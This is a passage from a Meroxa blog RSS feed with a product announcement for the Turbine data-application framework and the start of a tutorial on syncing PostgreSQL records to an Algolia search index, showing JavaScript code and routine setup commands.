&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Hello Meroxa 2.0]]></title><description><![CDATA[Since launching last April, Meroxa has become the de-facto platform for creating real-time data pipelines for over 300 companies.]]></description><link>https://meroxa.com/blog/hello-meroxa-2.0</link><guid isPermaLink="false">https://meroxa.com/blog/hello-meroxa-2.0</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 20 Apr 2022 18:15:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;em&gt;&lt;strong&gt;When they go low we go high — Michelle Obama&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Wowsers! What a difference a year makes!!! When Ali and I founded &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;, our goal was simple: turn real-time data into the default input for how companies deliver customer value. Since launching last April, Meroxa has become the de-facto platform for creating real-time data pipelines for over 300 companies, pushing billions of events through our infrastructure.&lt;/p&gt;
&lt;p&gt;Our customers have used us to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Build privacy law-compliant, real-time analytics dashboards based on geography&lt;/li&gt;
&lt;li&gt;Migrate petabytes of data from legacy, on-premise data warehouses to cloud-native solutions&lt;/li&gt;
&lt;li&gt;Transform legacy, proprietary data from sensors to report on aircraft health in real-time&lt;/li&gt;
&lt;li&gt;Update fraud detection models in real-time to more accurately prevent unauthorized transactions&lt;/li&gt;
&lt;li&gt;Use completed transactions to update a search index in real-time for an e-commerce platform&lt;/li&gt;
&lt;li&gt;Drive dynamic pricing and driver availability based on demand for an online grocer&lt;/li&gt;
&lt;li&gt;And much, much more…&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While taking a deep dive into who’s actually using our product, we noticed software engineers were increasingly our biggest audience. To better serve their needs, we released a &lt;a href=&quot;https://docs.meroxa.com/docs/introduction/building-pipelines/terraform/&quot;&gt;Terraform provider&lt;/a&gt; so they could programmatically build their pipelines, but if I’m being brutally honest, we knew that wasn’t enough to warrant their attention. This space is extremely crowded. There are 1700+ tools in the marketplace that help folks move data from one place to the next at various speeds and fidelity. Even with a plethora of point solutions in the “modern” data stack, engineers are spending more time dealing with the nuances of integration instead of delivering business value.&lt;/p&gt;
&lt;p&gt;Alongside our research, we also started hearing increased chatter about the importance of data applications. Today’s manifestation of data apps mostly takes the shape of analytics dashboards. While useful, this still feels a bit underwhelming given the number of data-specific platforms and tools at an engineer’s disposal.&lt;/p&gt;
&lt;p&gt;Fret no more, engineers. We heard you loud and clear, and I’d like to submit Meroxa’s data application framework, Turbine, for your approval. Turbine represents a big change not only for Meroxa the company (hence the 2.0) but for the industry as well. Most of the tools in the data space focus on low-code dashboards to do replication and/or integration. Turbine is a code-first offering that empowers software engineers to use the tools and best practices they’ve been employing for years to solve problems at scale.&lt;/p&gt;
&lt;p&gt;With Turbine being just code, there’s no need to have separate workflows for your app and your data infrastructure. Turbine is to data applications as Rails is to web application development. We provide an opinionated, yet flexible framework that allows engineers to create real-time data solutions in days, not months. Want to test the output of a pipeline before deploying it to production? Write unit tests that can be executed locally on your machine. Want to understand the impact of changes to your data model on your existing infrastructure? Write integration tests. Turbine allows you to bring software engineering best practices to the data world without procuring yet another point solution.&lt;/p&gt;
&lt;p&gt;At Meroxa, we understand the importance of easy access to data for our customers so they can in turn provide value to their customers. We’re excited to evolve the data app status quo beyond dashboard visualizations and give engineers the tools to build engaging, innovative solutions. If you’re excited and want to learn more about how we put the app in data app, check out the &lt;a href=&quot;/blog/turbine-putting-the-app-in-data-app&quot;&gt;Turbine: Putting the “App” in Data App&lt;/a&gt; blog post, &lt;a href=&quot;http://docs.meroxa.com/&quot;&gt;docs&lt;/a&gt;, and &lt;a href=&quot;https://github.com/meroxa/turbine-examples&quot;&gt;examples&lt;/a&gt; to get started. We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-time Search Indexing with Turbine and Algolia]]></title><description><![CDATA[Learn how to send and continuously sync data to Algolia using Turbine. With Turbine, you can properly test, review, and build data integrations in a code-first way.]]></description><link>https://meroxa.com/blog/real-time-search-indexing-with-turbine-and-algolia</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-search-indexing-with-turbine-and-algolia</guid><dc:creator><![CDATA[Taron Foxworth]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:58:00 GMT</pubDate><content:encoded>&lt;p&gt;Developers often consider using operational databases (e.g. &lt;a href=&quot;https://postgres.org/&quot;&gt;PostgreSQL&lt;/a&gt;, &lt;a href=&quot;https://www.mysql.com/&quot;&gt;MySQL&lt;/a&gt;) to perform search. However, search engines like &lt;a href=&quot;https://algolia.com/&quot;&gt;Algolia&lt;/a&gt; are more efficient for the searching problem because they provide low-latency search querying/filtering and search-specific features such as ranking, typo tolerance, and more.&lt;/p&gt;
&lt;p&gt;Once you have decided on a search engine, your next step is, inevitably, to answer: &lt;strong&gt;How do you send and &lt;em&gt;continuously&lt;/em&gt; sync data to Algolia?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is where &lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine&lt;/a&gt; comes in. With Turbine, you can properly test, review, and build data integrations in a code-first way. Then, you can easily deploy your data application to Meroxa. No more fragile deployments, no more manual testing, no more surprise maintenance, just code.&lt;/p&gt;
&lt;p&gt;Here is what a Turbine Application looks like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; updateIndex &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./algolia.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token function&quot;&gt;sendToAlgolia&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;updateIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;postgresql&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendToAlgolia&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this article, we are going to create a data application to ingest and sync data from PostgreSQL to Algolia.&lt;/p&gt;
&lt;p&gt;This application uses &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, but Turbine also has &lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt; libraries.&lt;/p&gt;
&lt;p&gt;Here is a quick overview of the steps we will take to get started:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;How it works?&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Setup&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Data Application&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Entrypoint&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Indexing to Algolia&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Secrets&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Running&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Verifying&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deployment&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;What&apos;s next?&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;How it works?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#how-it-works&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A data application responds to events from your data infrastructure. You can learn more about the anatomy of a JavaScript data application in the &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/real-time-search-indexing-with-turbine-and-algolia-c6d19cea6a92b1373d5c31bd71980f8f.png&quot; alt=&quot;Application Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;This data application will:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Listen to &lt;a href=&quot;https://medium.com/meroxa/stream-your-database-changes-with-change-data-capture-aa8797fa9070&quot;&gt;Create, Update, and Delete&lt;/a&gt; events from a Postgres database.&lt;/li&gt;
&lt;li&gt;Write the data to an Algolia index.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Setup&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#setup&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Before we begin, you need to set up a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Log in with the Meroxa CLI:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples&quot;&gt;Clone the example to your local machine&lt;/a&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; clone git@github.com:meroxa/turbine-js-examples.git&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Since this example uses JavaScript, you will need to have &lt;a href=&quot;https://nodejs.org/&quot;&gt;Node.js&lt;/a&gt; installed.&lt;/p&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Copy the &lt;code class=&quot;language-text&quot;&gt;search-indexing-algolia&lt;/code&gt; directory to your local machine:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;cp&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; ~/turbine-js-examples/search-indexing-algolia ~/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Install NPM dependencies:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; search-indexing-algolia&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;npm&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to build.&lt;/p&gt;
&lt;h2&gt;Data Application&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#data-application&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A data application responds to events from our data infrastructure. For example, as the customer interacts with PostgreSQL, we need to update the Algolia index.&lt;/p&gt;
&lt;p&gt;You can learn more about the anatomy of a JavaScript data application in the &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Entrypoint&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#entrypoint&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Within &lt;code class=&quot;language-text&quot;&gt;index.js&lt;/code&gt;, we will create a data application that will listen to the &lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table in PostgreSQL.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; updateIndex &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./algolia.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token function&quot;&gt;sendToAlgolia&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;updateIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;postgresql&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendToAlgolia&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is what the code does:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;exports.App&lt;/code&gt; - This is the entry point for your data application. It is responsible for identifying the upstream datastore, the upstream records, and the code to execute against the upstream records. This is the data pipeline logic (move data from here to there).&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;exports.SendToAlgolia&lt;/code&gt; - This is the function that is executed against the upstream records. It is responsible for indexing the records.&lt;/p&gt;
&lt;h3&gt;Indexing to Algolia&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#indexing-to-algolia&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;updateIndex&lt;/code&gt; function is responsible for updating the index in Algolia.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; algoliasearch &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;algoliasearch&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; client &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;algoliasearch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_ID&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_KEY&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
